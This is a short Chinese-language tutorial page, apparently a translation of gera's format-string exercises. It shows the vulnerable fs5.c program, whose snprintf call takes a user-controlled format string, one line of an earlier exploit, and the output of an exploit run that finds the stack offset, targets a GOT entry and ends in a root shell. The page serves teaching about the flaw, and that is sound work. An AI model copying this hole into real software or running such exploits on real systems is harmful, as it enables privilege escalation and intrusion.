非安全编程演示之格式化字符串(2)
2006-04-02 20:26:42 来源:WEB开发网
execl("/home/user/gera/fs4", "fs4", evil_buffer, NULL);
}
fs5.c分析
本例源代码如下:
/* fs5.c *
* specially crafted to feed your brain by gera@core-sdi.com */
/* go, go, go! */
int main(int argv,char **argc) {
char buf[256];
snprintf(buf,sizeof buf,argc[1]);
/* this line'll make your life easier */
printf("%s\n",buf);
}
最后,让我们来看一个经典的format string漏洞。不需要太多的解释,这个溢出非常
的典型,如果你有任何问题请阅读scut的精彩论述(译者注:最新版本为《format string -1.2》
)。这里将自动精确定位--仅仅出于教育目的。这是最后一行(printf("%s\n",buf);)注释的原因。
(译者注:为了方便自动精确定位??请参看alert7的关于自动精确定位的文章)
user@CoreLabs:~/gera$ ./exp_fs5
Reading stack frames...
frame 01 --> 40016478
frame 02 --> 00000001
frame 03 --> bffff8f8
frame 04 --> 41414141
Exact match found. Stack pop is: 4
_deregister address in GOT is: 0x080495ac
shellcode address in stack is: 0xbfffffcd
??000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
sh-2.05# exit
exit
user@CoreLabs:~/gera$
更多精彩
赞助商链接